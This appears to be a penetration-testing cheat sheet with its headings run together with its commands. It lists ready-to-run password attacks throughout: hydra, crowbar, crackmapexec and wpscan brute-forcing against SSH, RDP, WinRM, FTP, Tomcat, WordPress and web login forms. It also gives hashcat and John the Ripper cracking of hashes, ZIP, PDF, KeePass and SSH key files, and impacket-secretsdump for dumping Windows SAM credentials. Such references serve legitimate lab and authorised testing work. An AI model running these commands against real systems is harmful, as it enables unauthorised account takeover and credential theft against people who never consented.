Password Cracking
Wordlist
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/others/names.txtBruteforce
Tomcat GET
hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<Target IP Address>:8080/manager/htmlRDP
crowbar -b rdp -s <Target IP Address> -u <Username> -C /usr/share/wordlists/rockyou.txt -n 1Evil-WinRM
crackmapexec winrm <Target IP Address> -d <Domain Name> -u <Username Listt> -p <Password List>SSH
hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<Target IP Address> -s <Port>hydra -l <Username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <Target IP Address> ssh -t 4 -VHTTP-GET
hydra -l <Username> -P /usr/share/wordlists/rockyou.txt http-get://<Target IP Address>HTTP-POST
hydra <Target IP Address> http-form-post <"/form/frontpage.php:user=<username>&pass=^PASS^:INVALID LOGIN"> -l <Username> -P /usr/share/wordlists/rockyou.txt -vV -fhydra <Target IP Address> http-form-post <"/form/frontpage.php:user=^USER^&pass=^PASS^:INVALID LOGIN"> -L <Username List> -P /usr/share/wordlists/rockyou.txt -vV -fFTP
hydra -l <Username> -P /usr/share/wordlists/rockyou.txt -vV <Target IP Address> ftpZIP
fcrackzip -v -u -b -D -p /usr/share/wordlists/rockyou.txt <ZIP File>WordPress
wpscan --url <Target IP Address> -U <Username List> -P <Password List>ASC
3
Import the ASC
Hash Crack
Hash Finder
hashid <Hash Value>hash-identifierNOTE: For the above command, paste the hash after entering that
haiti '<Hash Value>'Hashcat
hashcat -m <Hash ID> '<Hash Value>' /usr/share/wordlists/rockyou.txt --forcehashcat 'hash' --showhashcat -m <Hash ID> <Hash File> /usr/share/wordlists/rockyou.txt --forcehashcat <Hash File> --showJohn The Ripper
Linux
1
Windows
john --wordlist=/usr/share/wordlists/rockyou.txt <Hash File> --format=NTjohn --rules --wordlist=/usr/share/wordlists/rockyou.txt <Hash File> --format=NTPDF
pdf2john <PDF File> > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hashZIP
zip2john <ZIP File> > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hashSAM & SYSTEM
impacket-secretsdump -sam SAM -system SYSTEM LOCALKeepass Database
keepass2john <KDBX File> > keepass.hash
john --wordlist=rockyou.txt keepass.hashSSH
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hashLast updated